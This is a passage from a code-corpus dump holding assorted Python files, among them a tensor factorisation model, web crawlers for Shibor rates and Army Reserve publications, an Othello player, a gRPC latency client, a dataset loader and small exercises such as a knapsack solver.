sum([\n occurrences[t][1] for t in range(latest_index - 2 * period_length, latest_index - period_length)\n ])\n\n ratio = current_count / old_count if old_count != 0 else None\n\n if ratio is None:\n level = 0 if current_count == 0 else 2\n elif ratio >= 2 * threshold:\n level = 2\n elif ratio >= threshold:\n level = 1\n else:\n level = 0\n\n return level, ratio, current_count\n","sub_path":"src/curtis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"377920332","text":"import numpy as np\nimport tqdm\ntry:\n from opt_einsum import contract as einsum\nexcept ImportError:\n from numpy import einsum\n\n\ndef hat(P, At, Ac, eps=None):\n if eps is None:\n eps = np.finfo(float).eps\n\n return eps + einsum('abfj,tj,cj->abftc', P, At, Ac)\n\n\ndef nnrandn(shape):\n \"\"\"generates randomly a nonnegative ndarray of given shape\n\n Parameters\n ----------\n shape : tuple\n The shape\n\n Returns\n -------\n out : array of given shape\n The non-negative random numbers\n \"\"\"\n return np.abs(np.random.randn(*shape))\n\n\nclass CFM(object):\n \"\"\"The Common Fate model\n Vj(a,b,f,t,c) = P(a,b,f,j)At(t,j)Ac(c,j)\n\n So we have one modulation texture \"shape\" for each frequency,\n hence P(a,b,f,j) which is activated over time, this is At(t,j) and over\n channels, this is Ac(c,j)\n\n Parameters\n ---------\n data_shape : iterable\n A tuple of integers representing the shape of the\n data to approximate\n n_components : int > 0\n the number of latent components for the NTF model\n positive integer\n beta : float\n The beta-divergence to use. An arbitrary float, but not\n that non-small integer values will significantly slow the\n calculation down. Particular cases of interest are:\n\n * beta=2 : Euclidean distance\n * beta=1 : Kullback Leibler\n * beta=0 : Itakura-Saito\n \"\"\"\n def __init__(\n self,\n data,\n nb_components,\n nb_iter=100,\n beta=1,\n P=None,\n At=None,\n Ac=None,\n ):\n # General fitting parameters\n self.data = data\n self.nb_components = nb_components\n self.beta = float(beta)\n self.nb_iter = nb_iter\n\n # Factorisation Parameters\n if P is None:\n self.P = nnrandn(self.data.shape[:3] + (nb_components,))\n else:\n self.P = P\n\n if At is None:\n self.At = nnrandn((self.data.shape[3], nb_components))\n else:\n self.At = At\n\n if Ac is None:\n self.Ac = nnrandn((self.data.shape[4], nb_components))\n else:\n self.Ac = Ac\n\n def fit(self):\n \"\"\"fits a common fate model to\n Z(a,b,f,t,i) = P(a,b,j)Af(f,j)At(t,j)Ac(i,j)\n \"\"\"\n\n def MU(einsumString, Z, factors):\n Zhat = hat(self.P, self.At, self.Ac)\n return (\n einsum(\n einsumString,\n self.data * (Zhat ** (self.beta - 2)),\n *factors) /\n einsum(\n einsumString,\n Zhat ** (self.beta - 1),\n *factors\n )\n )\n\n for it in tqdm.tqdm(range(self.nb_iter)):\n self.P *= MU('abftc,tj,cj->abfj', self.data, (self.At, self.Ac))\n self.At *= MU('abftc,abfj,cj->tj', self.data, (self.P, self.Ac))\n self.Ac *= MU('abftc,abfj,tj->cj', self.data, (self.P, self.At))\n\n return self\n\n @property\n def factors(self):\n return (self.P, self.At, self.Ac)\n\n @property\n def approx(self):\n return hat(self.P, self.At, self.Ac)\n","sub_path":"pycfm/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"188268238","text":"# Autor: Marianela Contreras Domínguez, A01374769\n# Descripcion: Problema para calcular el porcentaje de hombres y mujeres de una clase. \n\n# Escribe tu programa después de esta línea.\n\nmujeres = float(input(\"Mujeres inscritas:\"))\n\nhombres = float(input(\"Hombres inscritos:\"))\n\ntotal = int (mujeres + hombres)\nporcentajeMujeres = (mujeres*100)/total\nporcentajeHombres = (hombres*100)/total\n\nprint (\"Total de alumnos inscritos:\",(total))\nprint (\"Porcentaje de mujeres: %.1f\"% (porcentajeMujeres),\"%\")\nprint (\"Porcentaje de hombres: %.1f\" % (porcentajeHombres),\"%\")\n\n","sub_path":"clase.py","file_name":"clase.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"475038456","text":"# -*- coding: utf-8 -*- \r\n\r\n# Project: Shibor System\r\n# Description: shibor数据固定格式下载\r\n# Module:\r\n# Copyright: Copyright (c) 2013\r\n# Company: Olive Software\r\n# @author Richard\r\n# @version 0.1\r\n#\r\n#*************************************************************\r\n# Create: 2013-11-11\r\n#*************************************************************\r\n# Modified Histroy\r\n#\r\n\r\nimport sys\r\nimport os\r\nimport datetime\r\nimport time\r\nimport re\r\nimport urllib.request\r\nimport logging \r\nfrom olive.finance import spider,database\r\n\r\n\r\n\r\nlogging.basicConfig(filename = os.path.join(os.getcwd()+'/log', 'shibor_log{0}.txt'.format(time.strftime('%Y%m%d',time.gmtime()))),level = logging.INFO, filemode = 'w', format = '%(asctime)s - %(levelname)s : %(message)s') \r\n\r\n#连接数据库\r\nmydb=database.oliveMongoDB()\r\n\r\n#获取数据\r\n\r\nyear=int(datetime.date.today().year)\r\nmonth=int(datetime.date.today().month)\r\n\r\nif 12:\r\n\tyear=int(sys.argv[1])\r\n\tmonth=int(sys.argv[2])\r\n\r\ndatalist=[]\r\n\r\nif month!=-1:\r\n\tdatalist=spider.getShiborData(year,month)\r\n\r\nelse:\r\n\tdatalist=spider.getShiborData(year)\r\n\r\nmessage='get Datalist is Error!'\r\n\r\nif datalist==None:\r\n logging.error(message)\r\nelse:\r\n\tfor row in datalist:\r\n\t\tif mydb.updateData('shibor',{\"Date\":row[\"Date\"]},row,True):\r\n\t\t\tmessage='{0} data update is Ok!'.format(row[\"Date\"])\r\n\t\t\tlogging.info(message)\r\n\t\telse:\r\n\t\t\tmessage='{0} data update is Error!'.format(row[\"Date\"])\r\n\t\t\tlogging.error(message)\r\n\t\tprint(message)\r\n\t\r\n\tmessage='{0} records processed!'.format(len(datalist))\r\n\r\nprint('{0}\\r\\n{1}\\r\\n{2}'.format('='*80,message,'='*80))\r\n\r\nmydb.close()\r\n","sub_path":"get_shibor.py","file_name":"get_shibor.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"237822212","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2014 Harvard\n#\n# Authors:\n# Xavier Antoviaque \n#\n# This software's license gives you freedom; you can copy, convey,\n# propagate, redistribute and/or modify this program under the terms of\n# the GNU Affero General Public License (AGPL) as published by the Free\n# Software Foundation (FSF), either version 3 of the License, or (at your\n# option) any later version of the AGPL published by the FSF.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero\n# General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program in a file in the toplevel directory called\n# \"AGPLv3\". If not, see .\n#\n\n# Imports ###########################################################\n\nimport logging\nimport os\nimport pkg_resources\n\nfrom django.template import Context, Template\nfrom xblock.fragment import Fragment\n\n\n# Globals ###########################################################\n\nlog = logging.getLogger(__name__)\n\n\n# Functions #########################################################\n\ndef load_resource(resource_path):\n \"\"\"\n Gets the content of a resource\n \"\"\"\n resource_content = pkg_resources.resource_string(__name__, resource_path)\n return unicode(resource_content)\n\ndef render_template(template_path, context={}):\n \"\"\"\n Evaluate a template by resource path, applying the provided context\n \"\"\"\n template_str = load_resource(template_path)\n template = Template(template_str)\n return template.render(Context(context))\n\ndef get_scenarios_from_path(scenarios_path, include_identifier=False):\n \"\"\"\n Returns an array of (title, xmlcontent) from files contained in a specified directory,\n formatted as expected for the return value of the workbench_scenarios() method\n \"\"\"\n base_fullpath = os.path.dirname(os.path.realpath(__file__))\n scenarios_fullpath = os.path.join(base_fullpath, scenarios_path)\n\n scenarios = []\n if os.path.isdir(scenarios_fullpath):\n for template in os.listdir(scenarios_fullpath):\n if not template.endswith('.xml'):\n continue\n identifier = template[:-4]\n title = identifier.replace('_', ' ').title()\n template_path = os.path.join(scenarios_path, template)\n if not include_identifier:\n scenarios.append((title, load_resource(template_path)))\n else:\n scenarios.append((identifier, title, load_resource(template_path)))\n\n return scenarios\n\ndef load_scenarios_from_path(scenarios_path):\n \"\"\"\n Load all xml files contained in a specified directory, as workbench scenarios\n \"\"\"\n return get_scenarios_from_path(scenarios_path, include_identifier=True)\n\n\n# Classes ###########################################################\n\nclass XBlockWithChildrenFragmentsMixin(object):\n def get_children_fragment(self, context, view_name='student_view', instance_of=None,\n not_instance_of=None):\n \"\"\"\n Returns a global fragment containing the resources used by the children views,\n and a list of fragments, one per children\n - `view_name` allows to select a specific view method on the children\n - `instance_of` allows to only return fragments for children which are instances of \n the provided class\n - `not_instance_of` allows to only return fragments for children which are *NOT* \n instances of the provided class\n \"\"\"\n fragment = Fragment()\n named_child_frags = []\n for child_id in self.children: # pylint: disable=E1101\n child = self.runtime.get_block(child_id)\n if instance_of is not None and not isinstance(child, instance_of):\n continue\n if not_instance_of is not None and isinstance(child, not_instance_of):\n continue\n frag = self.runtime.render_child(child, view_name, context)\n fragment.add_frag_resources(frag)\n named_child_frags.append((child.name, frag))\n return fragment, named_child_frags\n\n def children_view(self, context, view_name='children_view'):\n \"\"\"\n Returns a fragment with the content of all the children's content, concatenated\n \"\"\"\n fragment, named_children = self.get_children_fragment(context)\n for name, child_fragment in named_children:\n fragment.add_content(child_fragment.content)\n return fragment\n","sub_path":"fbmxvideoquiz/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484676950","text":"import logging, grpc, time\r\nimport numpy as np\r\n\r\nimport server_tools_pb2\r\nimport server_tools_pb2_grpc\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\nPORT = '50051'\r\nf = open(\"IP.txt\")\r\nIP = f.read()\r\nif IP[-1] == '\\n':\r\n IP = IP[:-1]\r\nf.close()\r\n\r\ndef run(wait, num_images):\r\n # Get a handle to the server\r\n channel = grpc.insecure_channel(IP + ':' + PORT)\r\n stub = server_tools_pb2_grpc.MnistServerStub(channel)\r\n\r\n # Get a client ID which you need to talk to the server\r\n try:\r\n response = stub.RequestClientID(server_tools_pb2.NullParam())\r\n except:\r\n print(\"Connection to the server could not be established. Press enter to try again.\")\r\n return\r\n client_id = response.new_id\r\n\r\n # Generate lots of data\r\n data = np.random.rand(num_images, 28, 28, 1)\r\n data = data.tostring()\r\n\r\n # Send the data to the server and receive an answer\r\n start_time = time.time()\r\n if wait:\r\n response = stub.StartJobWait(server_tools_pb2.DataMessage(images=data, client_id=client_id, batch_size=32))\r\n else:\r\n idPackage = stub.StartJobNoWait(server_tools_pb2.DataMessage(images=data, client_id=client_id, batch_size=32))\r\n response = stub.ProbeJob(idPackage)\r\n while not response.complete:\r\n response = stub.ProbeJob(idPackage)\r\n if response.error != '':\r\n print(response.error)\r\n break\r\n\r\n # Print output\r\n original_array = np.frombuffer(response.prediction).reshape(num_images, 10)\r\n whole_time = time.time() - start_time\r\n fraction_not_predicting = (1 - response.infer_time / whole_time)\r\n channel.close()\r\n return whole_time, fraction_not_predicting / num_images\r\n\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig()\r\n wait = True\r\n image_number = list(range(1, 10))+list(range(10, 100, 10))\r\n wait_whole_times = []\r\n wait_fraction = []\r\n no_wait_whole_times = []\r\n no_wait_fraction = []\r\n print(\"WAITING\")\r\n for num_images in image_number:\r\n print(num_images)\r\n whole_time, fraction = run(True, num_images)\r\n wait_whole_times.append(whole_time)\r\n wait_fraction.append(fraction)\r\n print(\"NOT WAITING\")\r\n for num_images in image_number:\r\n print(num_images)\r\n whole_time, fraction = run(False, num_images)\r\n no_wait_whole_times.append(whole_time)\r\n no_wait_fraction.append(fraction)\r\n\r\n while True:\r\n i = input()\r\n if i == '':\r\n break\r\n plt.scatter(image_number, wait_fraction, c='r', marker='o', alpha=0.5)\r\n plt.scatter(image_number, no_wait_fraction, c='b', marker='s', alpha=0.5)\r\n plt.legend(['Wait for server to respond', 'Periodically check in with server'])\r\n plt.xlabel('Images sent')\r\n plt.xscale('log')\r\n plt.axis([1, 100, 0, float(i)])\r\n plt.ylabel('Fraction time spent not predicting per image')\r\n plt.show()\r\n\r\n while True:\r\n i = input()\r\n if i == '':\r\n break\r\n plt.scatter(image_number, wait_whole_times, c='r', marker='o', alpha=0.5)\r\n plt.scatter(image_number, no_wait_whole_times, c='b', marker='s', alpha=0.5)\r\n plt.legend(['Wait for server to respond', 'Periodically check in with server'])\r\n plt.xlabel('Images sent')\r\n plt.xscale('log')\r\n plt.axis([1, 100, 0, float(i)])\r\n plt.ylabel('Total wait time (s)')\r\n plt.show()\r\n","sub_path":"client-get-latency.py","file_name":"client-get-latency.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"282947148","text":"def GBM_FAST(mu, dt, time, So, n_lines, vol):\r\n #mu = .05\r\n #dt = (1/252)\r\n\r\n n = int(252 * time)\r\n #So = 50\r\n #n_lines = 10000\r\n\r\n #K = 60\r\n #H = 55\r\n sigma = np.array([vol]*n_lines)\r\n\r\n S = np.exp( (mu - sigma ** 2 / 2) * dt + sigma * np.random.normal(0, np.sqrt(dt), size=(len(sigma), n)).T )\r\n S = np.vstack([np.ones(len(sigma)), S])\r\n S = So * S.cumprod(axis=0)\r\n return(S)\r\n\r\n\r\n# Step 1. Generate Terminal Stock Price \r\nS = GBM_FAST(mu, dt, time, So, n_lines, vol)\r\n\r\nn_row, n_col = S.shape\r\nterminal_prices = (S[(n_row-1)][:])\r\nl = len(terminal_prices)\r\n\r\n\r\n# Step 2. Apply the unbiased estimator\r\noption_payoff = np.where(terminal_prices < K , (K-terminal_prices), 0.0 )\r\noption_payoff = option_payoff * np_prob(vol, time, H, So, terminal_prices) \r\n\r\nprice = np.power(np.average(option_payoff) , np.exp(-r*time))\r\nprint(price)\r\n\r\n\r\n\r\nwith plt.style.context('science'):\r\n fig, ax = plt.subplots(figsize=(3.75,3.25))\r\n ax.get_xaxis().set_major_formatter(matplotlib.ticker.FuncFormatter(lambda x, p: format(int(x), ',')))\r\n\r\n ax.yaxis.labelpad = 27\r\n plt.plot(time_steps, prices)\r\n\r\n plt.ylabel('Option \\n Price $(\\$)$', rotation = 'horizontal', fontsize = 14)\r\n plt.xlabel('Number of Monte Carlo Simulations', fontsize = 14)\r\n plt.title('Up-and-Out Put Option (UOP)', fontsize = 14)\r\n #plt.tight_layout()\r\n #plt.xlim(2000, np.max(time_steps))\r\n plt.savefig('plots/UOP_MC_500.jpg', dpi = 450)\r\n plt.show()\r\n\r\n\r\n\r\n","sub_path":"general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"34403761","text":"class ClaudiaEduardo_GulosoPlayer:\r\n def __init__(self, color):\r\n self.color = color\r\n\r\n def play(self, board):\r\n return self.pegaMaiorCaminho(board.valid_moves(self.color), board)\r\n \r\n \r\n # estrategia que escolhe de forma gulosa a jogada que \"come\" mais pecas do inimigo\r\n def pegaMaiorCaminho(self, moves, board):\r\n from models.board import Board\r\n import random\r\n from models.move import Move\r\n \r\n melhorDist = 0\r\n melhorMov = None\r\n \r\n distancias = {}\r\n \r\n # para cada jogava possivel, ver quantas pecas do inimigo sao comidas e pega a maior\r\n for move in moves:\r\n dist_total = 0\r\n \r\n # para cada jogada possivel, vamos olhar em todas as direcoes pra calcular o\r\n # quanto sera comido no total\r\n for direction in Board.DIRECTIONS:\r\n posicao = [move.x + direction[0], move.y + direction[1]]\r\n inimigo = Board.BLACK if self.color == Board.WHITE else Board.WHITE\r\n dist = 0\r\n \r\n casa_sendo_vista = board.get_square_color(posicao[0],posicao[1])\r\n \r\n # soma 1 a distancia se estamos num caminho valido (casas do inimigo no meio da \"linha\")\r\n while casa_sendo_vista == inimigo:\r\n posicao = [posicao[0] + direction[0], posicao[1] + direction[1]]\r\n casa_sendo_vista = board.get_square_color(posicao[0],posicao[1])\r\n dist = dist + 1\r\n \r\n # se o caminho termina com uma casa minha, sera valido (comecou com a casa vazia onde jogaremos)\r\n if casa_sendo_vista == self.color:\r\n dist_total = dist_total + dist\r\n \r\n # verifica se vamos \"comer\" mais com essa jogada\r\n if dist_total > melhorDist:\r\n melhorDist = dist_total\r\n melhorMov = move\r\n \r\n distancias[(move.x, move.y)] = dist_total\r\n \r\n \r\n # selecionar aleatoriamente entre os melhores, caso haja empate\r\n melhores = []\r\n for casa, dist in distancias.items():\r\n \tif dist == melhorDist:\r\n \t\tmelhores.append(Move(casa[0], casa[1]))\r\n \r\n \r\n return random.choice(melhores)\r\n \r\n","sub_path":"models/players/claudia_eduardo_guloso_player.py","file_name":"claudia_eduardo_guloso_player.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"296272102","text":"import bs4\nimport re\nimport os\nimport requests\nimport json\nimport datetime\nfrom typing import Iterable\nimport itertools\nfrom dataPipelines.gc_crawler.requestors import MapBasedPseudoRequestor\nfrom dataPipelines.gc_crawler.exec_model import Crawler, Parser, Pager\nfrom dataPipelines.gc_crawler.data_model import Document, DownloadableItem\nfrom dataPipelines.gc_crawler.utils import abs_url\n\nfrom . import SOURCE_SAMPLE_DIR, BASE_SOURCE_URL\n\ndef remove_html_tags(text):\n import re\n clean=re.compile('<.*?>')\n return re.sub(clean,'',text)\n\nclass ArmyReservePager(Pager):\n \"\"\"Pager for ArmyReserve Issuance crawler\"\"\"\n\n def iter_page_links(self) -> Iterable[str]:\n \"\"\"Iterator for page links\"\"\"\n url = 'https://www.usar.army.mil/Publications/'\n\n yield url\n\n\nclass ArmyReserveParser(Parser):\n \"\"\"Parser for ArmyReserve Issuance crawler\"\"\"\n\n def parse_docs_from_page(self, page_url: str, page_text: str) -> Iterable[Document]:\n \"\"\"Parse document objects from page of text\"\"\"\n\n # parse html response\n page2 = requests.get(page_url)\n soup2 = bs4.BeautifulSoup(page2.content, 'html.parser')\n doc_num = []\n pdf = []\n doc_title = []\n datelist = []\n doctype = []\n parsed_docs = []\n webpart2 = soup2.find(\"div\", {\"class\": \"skin-pane2 col-md-8\"})\n meta = webpart2.find_all(\"div\")\n for row in meta:\n if ((remove_html_tags((str(row))).isspace()) or not remove_html_tags((str(row)))):\n continue\n for cell in row.find_all('p'):\n # print(cell.find(\"strong\"))\n words = ''\n links = cell.find_all(\"a\")\n link_list = list(links)\n # print(links)\n nums = []\n pdf_links = [link['href'] for link in link_list if \"pdf\" in link['href'] or \"aspx\" in link['href']]\n if not pdf_links:\n continue\n pdf.append(str(pdf_links[0]))\n # print(pdf_links)\n words = remove_html_tags((str(cell.find(\"strong\")))).encode('ascii', 'ignore').decode('ascii').lstrip(\n \" \").rstrip(\" \")\n words = \" \".join(words.split())\n # print(words)\n # else:\n # print(cell)\n doc_num.append(words)\n pdf.append(str(pdf_links[0]))\n title = [text for text in cell.find_all(text=True) if text.parent.name != \"strong\"]\n doc_title.append(title)\n pub_links = []\n [pub_links.append(x) for x in pdf if x not in pub_links]\n document_name = []\n [document_name.append(x) for x in doc_num if x not in document_name]\n document_type = []\n [document_type.append(' '.join(x.split()[0:2])) for x in document_name]\n document_number = []\n [document_number.append(' '.join(x.split()[2:])) for x in document_name]\n document_title = []\n [document_title.append(x) for x in doc_title if x not in document_title]\n document_title = [item for sublist in document_title for item in sublist]\n document_title = [str(item).encode('ascii', 'ignore').decode('ascii').lstrip(\" \").rstrip(\" \") for item in\n document_title]\n final = list(itertools.zip_longest(document_type, document_number, document_title, pub_links))\n final = [list(x) for x in final]\n for item in final:\n doc_name = item[0]+' '+item[1]\n if (item[2] is None):\n doc_title=\"\"\n else:\n doc_title = item[2]\n doc_num = item[1]\n doc_type = item[0]\n publication_date = \"N/A\"\n if item[3].startswith(\"https\"):\n cac_login_required=True\n url = item[3]\n url = url.replace(\" \",\"%20\")\n else:\n cac_login_required=False\n url = \"https://www.usar.army.mil\"+item[3]\n url = url.replace(\" \",\"%20\")\n pdf_di = DownloadableItem(doc_type='pdf', web_url=url)\n version_hash_fields = {\n \"item_currency\": str(url).split('/')[-1], # version metadata found on pdf links\n \"document_title\": doc_title.strip(),\n \"document_number\": doc_num.strip()\n }\n if (str(doc_type).startswith(\"USAR\") == False):\n doc_title = doc_name\n doc_num = \"\"\n doc_type = \"USAR Doc\"\n version_hash_fields = {\n \"item_currency\": str(url).split('/')[-1], # version metadata found on pdf links\n \"document_title\": doc_title.strip(),\n \"document_number\": doc_num.strip()}\n\n doc = Document(\n doc_name=doc_name.strip(),\n doc_title=re.sub('\\\\\"', '', doc_title),\n doc_num=doc_num.strip(),\n doc_type=doc_type.strip(),\n publication_date=publication_date,\n cac_login_required=cac_login_required,\n crawler_used=\"Army_Reserve\",\n source_page_url=page_url.strip(),\n version_hash_raw_data=version_hash_fields,\n downloadable_items=[pdf_di]\n )\n\n parsed_docs.append(doc)\n return parsed_docs\n\n\nclass ArmyReserveCrawler(Crawler):\n \"\"\"Crawler for the example web scraper\"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(\n *args,\n **kwargs,\n pager=ArmyReservePager(\n starting_url=BASE_SOURCE_URL\n ),\n parser=ArmyReserveParser()\n )\n\n\nclass FakeArmyReserveCrawler(Crawler):\n \"\"\"Army Reserve crawler that just uses stubs and local source files\"\"\"\n def __init__(self, *args, **kwargs):\n with open(os.path.join(SOURCE_SAMPLE_DIR, 'ArmyReserve.html')) as f:\n default_text = f.read()\n\n super().__init__(\n *args,\n **kwargs,\n pager=ArmyReservePager(\n requestor=MapBasedPseudoRequestor(\n default_text=default_text\n ),\n starting_url=BASE_SOURCE_URL\n ),\n parser=ArmyReserveParser()\n )\n","sub_path":"dataPipelines/gc_crawler/army_reserves/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"63970380","text":"import logging\nfrom bs4 import BeautifulSoup\nfrom Utils.Utils import WebSite\nfrom spider.baseSiteParser import BaseNewsParser, ScpNewsParser\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass RmltParser(BaseNewsParser):\n\n def __init__(self):\n self.domain = 'rmlt.com.cn'\n self.Scp = ScpNewsParser()\n\n def parser(self, url):\n logger.info(url)\n content = WebSite.web_fetch2(url, decode='utf-8')\n soup = BeautifulSoup(content, 'lxml')\n fgxnews = soup.find_all('li', class_='fgxnews')\n for tree in fgxnews:\n tag = tree.find('a', target='_blank', title=True)\n title = tag.get('title')\n url = tag.get('href')\n seg = self.Scp.Begin()\n seg.set_title(title) \\\n .set_url(url) \\\n .End()\n\n def get_result(self):\n return self.Scp.get_params()\n","sub_path":"spider/news/rmlt.py","file_name":"rmlt.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"557097434","text":"from class_model.dataset import DataSet\nimport class_model.mathutil as mu\nimport class_model.dataset_mode as dm\nimport os\nimport numpy as np\nfrom class_model.dataset_mode import Select\n\n\n# noinspection PyCallByClass\nclass Office31Dataset(DataSet):\n def __init__(self, resolution=[100, 100], input_shape=[-1]):\n\n super(Office31Dataset, self).__init__('office31', 'dual_select')\n\n path = '../data/domain_adaptation_images'\n domain_names = mu.list_dir(path)\n\n images = []\n didxs, oidxs = [], []\n object_names = None\n\n for dx, dname in enumerate(domain_names):\n domainpath = os.path.join(path, dname, 'images')\n object_names = mu.list_dir(domainpath)\n\n for ox, oname in enumerate(object_names):\n objectpath = os.path.join(domainpath, oname)\n filenames = mu.list_dir(objectpath)\n for fname in filenames:\n if fname[-4:] != '.jpg':\n continue\n imagepath = os.path.join(objectpath, fname)\n pixels = mu.load_image_pixels(imagepath, resolution, input_shape)\n images.append(pixels)\n didxs.append(dx)\n oidxs.append(ox)\n self.image_shape = resolution + [3]\n\n xs = np.asarray(images, np.float32) # shape(4110, 30000)\n\n ys0 = mu.onehot(didxs, len(domain_names)) # ys0.shape(4110, 3)\n ys1 = mu.onehot(oidxs, len(object_names)) # ys1.shape(4110, 31)\n ys = np.hstack([ys0, ys1]) # ys.shape(4110, 34)\n\n self.dataset_shuffle_data(xs, ys, 0.8)\n self.target_names = [domain_names, object_names]\n self.cnts = [len(domain_names)]\n\n def dataset_forward_postproc(self, output, y):\n # print(\"office dataset_forward_postproc\")\n outputs, ys = np.hsplit(output, self.cnts), np.hsplit(y, self.cnts)\n\n loss0, aux0 = Select.dataset_forward_postproc(self, outputs[0], ys[0])\n loss1, aux1 = Select.dataset_forward_postproc(self, outputs[1], ys[1])\n # print(f\"loss0{loss0} \\n loss1 {loss1}\")\n return loss0 + loss1, [aux0, aux1]\n\n def dataset_backprop_postproc(self, G_loss, aux):\n # print(\"office dataset_backprop_postproc\")\n aux0, aux1 = aux\n\n G_output0 = Select.dataset_backprop_postproc(self, G_loss, aux0) # G_output0 (10, 3)\n G_output1 = Select.dataset_backprop_postproc(self, G_loss, aux1) # G_output1 (10, 31)\n # print(f\"G_output {G_output0.shape}, {G_output1.shape}\")\n\n return np.hstack([G_output0, G_output1])\n\n def dataset_eval_accuracy(self, x, y, output):\n # print(\"office dataset_eval_accuracy\")\n outputs, ys = np.hsplit(output, self.cnts), np.hsplit(y, self.cnts)\n\n acc0 = Select.dataset_eval_accuracy(self, x, ys[0], outputs[0])\n acc1 = Select.dataset_eval_accuracy(self, x, ys[1], outputs[1])\n\n return [acc0, acc1]\n\n def dataset_train_prt_result(self, epoch, costs, accs, acc, time1, time2):\n # print(\"office dataset_train_prt_result\")\n acc_pair = np.mean(accs, axis=0)\n print(' Epoch {}: cost={:5.3f}, accuracy={:5.3f}+{:5.3f}/{:5.3f}+{:5.3f} ({}/{} secs)'.format(epoch,\n np.mean(costs),\n acc_pair[0],\n acc_pair[1],\n acc[0], acc[1],\n time1,\n time2))\n\n def dataset_test_prt_result(self, name, acc, time):\n # print(\"office dataset_test_prt_result\")\n\n print('Model {} test report: accuracy = {:5.3f}+{:5.3f}, ({} secs)\\n'.format(name, acc[0], acc[1], time))\n\n def dataset_get_estimate(self, output):\n # print(\"office get_estimate\")\n outputs = np.hsplit(output, self.cnts)\n\n estimate0 = Select.dataset_get_estimate(self, outputs[0])\n estimate1 = Select.dataset_get_estimate(self, outputs[1])\n\n return np.hstack([estimate0, estimate1])\n\n def visualize(self, xs, estimates, answers):\n\n print(\" office visualize \")\n # print(f\"estimates{estimates}\\n{answers}\")\n mu.draw_images_horz(xs, self.image_shape)\n # print(f\"estimates type {type(estimates)} shape {estimates.shape}\")\n ests, anss = np.hsplit(estimates, self.cnts), np.hsplit(answers, self.cnts)\n\n captions = ['도메인', '상품']\n # print(f\"self.target_names,{len(self.target_names[0])},\\n,{len(self.target_names[1])}\")\n for m in range(2):\n print('[ {} 추정결과 ]'.format(captions[m]))\n print(f\"ests[{m}]{ests[m].shape}\")\n mu.show_select_results(ests[m], anss[m], self.target_names[m], 8)\n","sub_path":"ADAM/dataset_office31.py","file_name":"dataset_office31.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238492726","text":"import pygame\n\nclass Ship(object):\n\t\"\"\"doc string for Ship\"\"\"\n\tdef __init__(self,setting,screen):\n\t\tself.screen = screen\n\t\tself.setting = setting\n\n\t\t#加载图片并获取矩形框\n\t\tself.image = pygame.image.load('images/rock.png')\n\t\tself.image_rect = self.image.get_rect()\n\t\tself.screen_rect = screen.get_rect()\n\n\t\t#放置矩形\n\t\tself.image_rect.centerx = self.screen_rect.centerx\n\t\tself.image_rect.bottom = self.screen_rect.bottom\n\n\t\t# \n\t\tself.center = float(self.image_rect.centerx)\n\n\t\t#\n\t\tself.moving_right = False\n\t\tself.moving_left = False\n\n\tdef blitme(self):\n\t\t\"\"\" 在制定位置绘制飞船 \"\"\"\n\t\tself.screen.blit(self.image,self.image_rect)\n\n\tdef update(self):\n\t\tif self.moving_right and self.image_rect.right < self.screen_rect.right:\n\t\t\tself.center += self.setting.ship_speed_facter\n\t\tif self.moving_left and self.image_rect.left > 0 :\n\t\t\tself.center -= self.setting.ship_speed_facter \n\n\t\t# 根据self.center更新 rect 对象\n\t\tself.image_rect.centerx = self.center","sub_path":"Game/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146177615","text":"def solve(n,W,arr,ind): \n dp = [[0 for i in range(W+1)] for j in range(n+1)]\n for i in range(1,n+1):\n for j in range(1,W+1):\n if arr[i-1] <= j:\n dp[i][j] = max(ind[i-1] + dp[i-1][j-arr[i-1]], dp[i-1][j])\n else:\n dp[i][j] = dp[i-1][j]\n return dp[n][W]\n\nt = int(input())\nwhile t > 0:\n n = int(input())\n W = int(input())\n ind = list(map(int,input().split()))\n arr = list(map(int,input().split()))\n print(solve(n,W,arr,ind))\n t -= 1","sub_path":"Dynamic programming/0_1_knapsack.py","file_name":"0_1_knapsack.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"77027536","text":"# coding: utf-8\r\n# Starting function\r\n# Created by James Raphael Tiovalen (2020)\r\n\r\nimport slack\r\nimport config\r\n\r\nfrom slackers.hooks import commands\r\n\r\nconv_db = 